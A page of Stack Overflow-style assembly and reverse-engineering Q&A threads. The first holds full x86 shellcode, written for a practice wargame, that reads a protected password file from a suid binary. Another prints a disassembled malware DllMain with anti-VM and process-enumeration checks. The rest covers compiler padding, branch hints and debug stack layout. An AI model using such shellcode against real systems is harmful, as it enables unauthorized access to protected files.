PTRACE_TRACEME without parent - ptrace

I'm trying for fun to exploit a code which uses ptrace to prevent debugging. This executable is suid, therefore there's no use in cracking it.
It have also the stack segment executable. This executable is made for playing. After I found my self a vulnerability in it, I tried buffer overflow it. I wrote a shellcode which launches a shell, and with my surprise it hangs. (BASH reports the process have been stopped) After some tests, I ended up to the conclusion that ptrace do not only prevents debugging, but it also prevents my shellcode to get executed.
Reading about ptrace, I found that a process which invokes ptrace(PTRACE_TRACEME,0,1,0) will be stoped as soon as it invokes the syscall exec. So I changed strategy, since ptrace will stop the process as soon as it launches an executable, I tried a shellcode which reads a file. My objective is not launch a shell, but instead read a file which my user have no permission. At last, this code also hanged.
Can anyone explain me why my code, in spite it contains no exec call, it gets hanged?
Is there any way to stop the ptrace from within the process itself?
In my case, ptraced process have no parent, and it is running with higher privileges, cause the suid, how can it be controlled?
Here my code which should not contains any exec.
Here my shell code:
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: eb 38 jmp 0x42
a: 5b pop ebx
b: c6 43 13 01 mov BYTE PTR [ebx+0x13],0x1
f: fe 4b 13 dec BYTE PTR [ebx+0x13]
12: b0 05 mov al,0x5
14: 31 c9 xor ecx,ecx
16: cd 80 int 0x80
18: 89 c6 mov esi,eax
1a: eb 06 jmp 0x22
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
22: 89 f3 mov ebx,esi
24: b0 03 mov al,0x3
26: 83 ec 01 sub esp,0x1
29: 89 e1 mov ecx,esp
2b: b2 01 mov dl,0x1
2d: cd 80 int 0x80
2f: 31 db xor ebx,ebx
31: 39 c3 cmp ebx,eax
33: 74 e7 je 0x1c
35: b0 04 mov al,0x4
37: b3 01 mov bl,0x1
39: b2 01 mov dl,0x1
3b: cd 80 int 0x80
3d: 83 c4 01 add esp,0x1
40: eb e0 jmp 0x22
42: e8 c3 ff ff ff call 0xa
47: db '/home/level8/passwd'

I believe you have a core misunderstanding of how ptrace works.
When the process stops after calling execve, that is a good thing. It means your debugger gets a chance to change things around, both before and after the execve.
It seems to me like you wrote ptrace(PTRACE_TRACEME) in the child, but you have not implemented any of the parent side support you should have. As a result, as soon as ptrace is trying to notify the debugger of an event, your process stops and never restarts.

Related

Errata in "Practical Reverse Engineering"?

I've just started the book Practical Reverse Engineering by Bruce Dang et alia, and am confused about a portion of the "walk-through" at the end of chapter one. This is the relevant portion of code:
65: ...
66: loc_10001d16:
67: mov eax, [ebp-118h]
68: mov ecx, [ebp-128h]
69: jmp short loc_10001d2a (line 73)
70: loc_10001d24:
71: mov eax, [ebp+0ch]
72: mov ecx, [ebp+0ch]
73: loc_10001d2a:
74: cmp eax, ecx
75: pop esi
76: jnz short loc_10001D38 (line 82)
77: xor eax, eax
78: pop edi
79: mov esp, ebp
80: pop ebp
81: retn 0ch
82: ...
And the authors' commentary:
"After the loop exits, execution resumes at line 66. Lines 67–68 save the matching PROCESSENTRY32’s th32ParentProcessID/th32ProcessID in EAX/ECX and
continue execution at 73. Notice that Line 66 is also a jump target in line 43.
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check
whether it is 0 (DLL_PROCESS_DETACH). If it is, the return value is set to 0 and
it returns; otherwise, it goes to line 82."
This is not how I interpreted the code when reading it; surely any jump to loc_10001d24 (line 70) will cause the function to terminate with return value 0 unconditionally, and not only if the value at ebp+0x0c is 0? (I assume that poping into esi does not affect the eflags register, and that the jump in line 76 conditions on the result of cmp eax, ecx in line 74?) This is also consistent with earlier portions in the code, which jump to loc_10001d24 if various called functions return with values indicating failure.
In addition, I thought the point of the section starting at line 66 was to also return with value 0 if PROCESSENTRY32 (a structure defined earlier, starting at position ebp-0x130 in memory) has equal th32ParentProcessID (ebp-0x118 in memory) and th32ProcessID (ebp-0x128 in memory) entries; is this correct? The authors' commentary did not seem to indicate this.
As a more general question, even just chapter 1 of the book has seemed to have had quite a large number of typos; does anyone know of a webpage collecting errata from the book anywhere?
Yes, ECX and EAX are both loaded from the same memory location, so unless something else has a pointer to it and is changing it asynchronously, cmp x,x / jne will always be not-taken. Unlike floating-point, ever possible integer is equal to itself.
And you're correct, pop doesn't change EFLAGS, as per Intel's manuals: https://www.felixcloutier.com/x86/pop.
To check whether a memory location is zero, you can load it into a reg for test eax,eax / jnz
or cmp dword ptr [ebp + 0xc], 0 / jne.
(JNE and JNZ are the same instruction; the different mnemonics let you express the semantic meanings of equality or directly being zero based on ZF being set according to the value itself.)
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check whether it is 0 (DLL_PROCESS_DETACH)
This is bogus. If the book is full of stuff like that, that doesn't sound like a good book.
The cmp eax,ecx only makes any sense when reached from the path that loaded 2 different values. (And couldn't use test for that, x & y != 0 doesn't tell you whether they were equal.) This seems unlikely to be real compiler output.
This is the full listing. It's part of malware found in the wild:
01: ; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
02: _DllMain#12 proc near
03: 55 push ebp
04: 8B EC mov ebp, esp
05: 81 EC 30 01 00+ sub esp, 130h
06: 57 push edi
07: 0F 01 4D F8 sidt fword ptr [ebp-8]
08: 8B 45 FA mov eax, [ebp-6]
09: 3D 00 F4 03 80 cmp eax, 8003F400h
10: 76 10 jbe short loc_10001C88 (line 18)
11: 3D 00 74 04 80 cmp eax, 80047400h
12: 73 09 jnb short loc_10001C88 (line 18)
13: 33 C0 xor eax, eax
14: 5F pop edi
15: 8B E5 mov esp, ebp
16: 5D pop ebp
17: C2 0C 00 retn 0Ch
18: loc_10001C88:
19: 33 C0 xor eax, eax
20: B9 49 00 00 00 mov ecx, 49h
21: 8D BD D4 FE FF+ lea edi, [ebp-12Ch]
22: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 0
23: 50 push eax
24: 6A 02 push 2
25: F3 AB rep stosd
26: E8 2D 2F 00 00 call CreateToolhelp32Snapshot
27: 8B F8 mov edi, eax
28: 83 FF FF cmp edi, 0FFFFFFFFh
29: 75 09 jnz short loc_10001CB9 (line 35)
30: 33 C0 xor eax, eax
31: 5F pop edi
32: 8B E5 mov esp, ebp
33: 5D pop ebp
34: C2 0C 00 retn 0Ch
35: loc_10001CB9:
36: 8D 85 D0 FE FF+ lea eax, [ebp-130h]
37: 56 push esi
38: 50 push eax
39: 57 push edi
40: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 128h
41: E8 FF 2E 00 00 call Process32First
42: 85 C0 test eax, eax
43: 74 4F jz short loc_10001D24 (line 70)
44: 8B 35 C0 50 00+ mov esi, ds:_stricmp
45: 8D 8D F4 FE FF+ lea ecx, [ebp-10Ch]
46: 68 50 7C 00 10 push 10007C50h
47: 51 push ecx
48: FF D6 call esi
49: 83 C4 08 add esp, 8
50: 85 C0 test eax, eax
51: 74 26 jz short loc_10001D16 (line 66)
52: loc_10001CF0:
53: 8D 95 D0 FE FF+ lea edx, [ebp-130h]
54: 52 push edx
55: 57 push edi
56: E8 CD 2E 00 00 call Process32Next
57: 85 C0 test eax, eax
58: 74 23 jz short loc_10001D24 (line 70)
59: 8D 85 F4 FE FF+ lea eax, [ebp-10Ch]
60: 68 50 7C 00 10 push 10007C50h
61: 50 push eax
62: FF D6 call esi
63: 83 C4 08 add esp, 8
64: 85 C0 test eax, eax
65: 75 DA jnz short loc_10001CF0 (line 52)
66: loc_10001D16:
67: 8B 85 E8 FE FF+ mov eax, [ebp-118h]
68: 8B 8D D8 FE FF+ mov ecx, [ebp-128h]
69: EB 06 jmp short loc_10001D2A (line 73)
70: loc_10001D24:
71: 8B 45 0C mov eax, [ebp+0Ch]
72: 8B 4D 0C mov ecx, [ebp+0Ch]
73: loc_10001D2A:
74: 3B C1 cmp eax, ecx
75: 5E pop esi
76: 75 09 jnz short loc_10001D38 (line 82)
77: 33 C0 xor eax, eax
78: 5F pop edi
79: 8B E5 mov esp, ebp
80: 5D pop ebp
81: C2 0C 00 retn 0Ch
82: loc_10001D38:
83: 8B 45 0C mov eax, [ebp+0Ch]
84: 48 dec eax
85: 75 15 jnz short loc_10001D53 (line 93)
86: 6A 00 push 0
87: 6A 00 push 0
88: 6A 00 push 0
89: 68 D0 32 00 10 push 100032D0h
90: 6A 00 push 0
91: 6A 00 push 0
92: FF 15 20 50 00+ call ds:CreateThread
93: loc_10001D53:
94: B8 01 00 00 00 mov eax, 1
95: 5F pop edi
96: 8B E5 mov esp, ebp
97: 5D pop ebp
98: C2 0C 00 retn 0Ch
99: _DllMain#12 endp
So lines 70-74 make no sense on their own, but do serve the original purpose - if either Process32First()/Process32Next() returns FALSE then the code jumps here and eventually exits with 0.
And if the desired process was found then eax/ecx are set to ParentProcessID/ProcessID respectively so the function will continue.
Anyway, there's also lines 83-85 which the books states:
...with lpStartAddress as 0x100032D0. This block can be decompiled as follows:
if (fdwReason == DLL_PROCESS_DETACH) { return FALSE; }
if (fdwReason == DLL_THREAD_ATTACH || fdwReason == DLL_THREAD_DETACH) { return TRUE; }
CreateThread(0, 0, (LPTHREAD_START_ROUTINE) 0x100032D0, 0, 0, 0);
return TRUE;
Lines 83-85 actually check if fdwReason equals DLL_PROCESS_ATTACH or not (bypassing the call to CreateThread if not, which makes perfect sense), and there's no special case for DLL_PROCESS_DETACH.
I'll say that the book certainly lacks proper structure, some things the book takes for granted, other maybe mundane things are emphasizes. Still a very good resource.
Oh well, who said this was easy.

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
int a = 0;
a += 1;
return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I learned nops do nothing, and since after ret wouldn't even be executed.
My question is: why bother? Couldn't ELF(linux-x86) work with a .text section(+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly
language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
This is done to align the next function by 8, 16 or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A.Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an importantsubroutine entry or jump label happens to be near the end of a 16-byte block then themicroprocessor will only get a few useful bytes of code when fetching that block of code. Itmay have to fetch the next 16 bytes too before it can decode the first instructions after thelabel. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many
NOP
's as needed before thesubroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
As far as I remember, instructions are pipelined in cpu and different cpu blocks (loader, decoder and such) process subsequent instructions. When RET instructions is being executed, few next instructions are already loaded into cpu pipeline. It's a guess, but you can start digging here and if you find out (maybe the specific number of NOPs that are safe, share your findings please.

gcc likely() unlikely() macros and assembly code

I'm trying to see how gcc's likely() and unlikely() branch prediction macros has effect on assembly code. In the following piece of code I don't see any difference in the generated assembly code regardless of which macro i use. Any pointers on what's happening?
0 int main() {
1 volatile int x;
2 unlikely(x)?x++:x--;
3 }
Asm code:
0 0000000000000014 <main>:
1 int main() {
2 14: 55 push rbp
3 15: 48 89 e5 mov rbp,rsp
4 volatile int x;
5 likely(x)?x++:x--;
6 18: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
7 1b: 85 c0 test eax,eax
8 1d: 0f 95 c0 setne al
9 20: 0f b6 c0 movzx eax,al
10 23: 48 85 c0 test rax,rax
11 26: 74 0b je 33 <main+0x1f>
12 28: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
13 2b: 83 c0 01 add eax,0x1
14 2e: 89 45 fc mov DWORD PTR [rbp-0x4],eax
15 31: eb 09 jmp 3c <main+0x28>
16 33: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
17 36: 83 e8 01 sub eax,0x1
18 39: 89 45 fc mov DWORD PTR [rbp-0x4],eax
19 }
20 3c: 5d pop rbp
21 3d: c3 ret
It looks like you compiled without optimization. Basic block reordering is an optimization, so without it, __builtin_expect does not have this effect. With optimization, I observe that the sense of the branch is inverted when switching the expected result.
Note that whether this has any effect on current x86 processors is difficult to say.

What's the purpose of signal pt in this example

What does callq 400b90 <signal#plt> do?
How would it look line in C?
4013a2: 48 83 ec 08 sub $0x8,%rsp
4013a6: be a0 12 40 00 mov $0x4012a0,%esi
4013ab: bf 02 00 00 00 mov $0x2,%edi
4013b0: e8 db f7 ff ff callq 400b90 <signal#plt>
4013b5: 48 83 c4 08 add $0x8,%rsp
4013b9: c3 retq
What does callq 400b90 <signal#plt> do?
Call the signal function via the PLT (procedure linkage table). So more technical: It pushes the current instruction pointer onto the stack and jumps to signal#plt.
How would it look line in C?
void* foo(void) {
return signal(2, (void *) 0x4012a0);
}
Let's look at your code line-by-line:
sub $0x8,%rsp
This reserves some stack space. You can ignore this (the stack space is unused).
mov $0x4012a0,%esi
mov $0x2,%edi
Put the value 0x4012a0 and 0x2 in the registers ESI and EDI. By the ABI, this is how arguments are passed to a function.
callq 400b90 <signal#plt>
Call the function signal through the PLT. The PLT has something to do with the dynamic linker since we cannot be sure where the signal function will end up in memory whenthis is built. Basically, this just finds the final memory location and calls signal.
add $0x8,%rsp
retq
Undo the sub from earlier and return to the caller.

Why do we allocate 12 bytes for each variable?

In visual Studio 2010 Professional (x86, Windows 7):
... more
00DC1362 B9 39 00 00 00 mov ecx,39h
00DC1367 B8 CC CC CC CC mov eax,0CCCCCCCCh
00DC136C F3 AB rep stos dword ptr es:[edi]
20: int a = 3;
00DC136E C7 45 F8 03 00 00 00 mov dword ptr [ebp-8],3
21: int b = 10;
00DC1375 C7 45 EC 0A 00 00 00 mov dword ptr [ebp-14h],0Ah
22: int c;
23: c = a + b;
00DC137C 8B 45 F8 mov eax,dword ptr [ebp-8]
00DC137F 03 45 EC add eax,dword ptr [ebp-14h]
00DC1382 89 45 E0 mov dword ptr [ebp-20h],eax
24: return 0;
Notice how the relative addressing variable A and B are not aligned by word size of 4?
What is happening here?
Also, why do we skip $ebp - 8 ?
Turning off the optimization will show the ideal addressing scheme.
Can someone please explain the reason? Thanks.
The offset of each variable is 12 bytes. A -> B -> C
I made a mistake. I meant why do we skip the first 8 bytes.
You are looking at the code generated by the default Debug build setting. Particularly the /RTC option (enable run-time error checks). Filling the stack frame with 0xcccccccc helps diagnose uninitialized variables, the gaps around the variables help diagnose buffer overflow.
There isn't much point in looking at this code, you are not going to ship that. It is purely a Debug build artifact, only there to help you get the bugs out of the code. None of it remains in the Release build.

Resources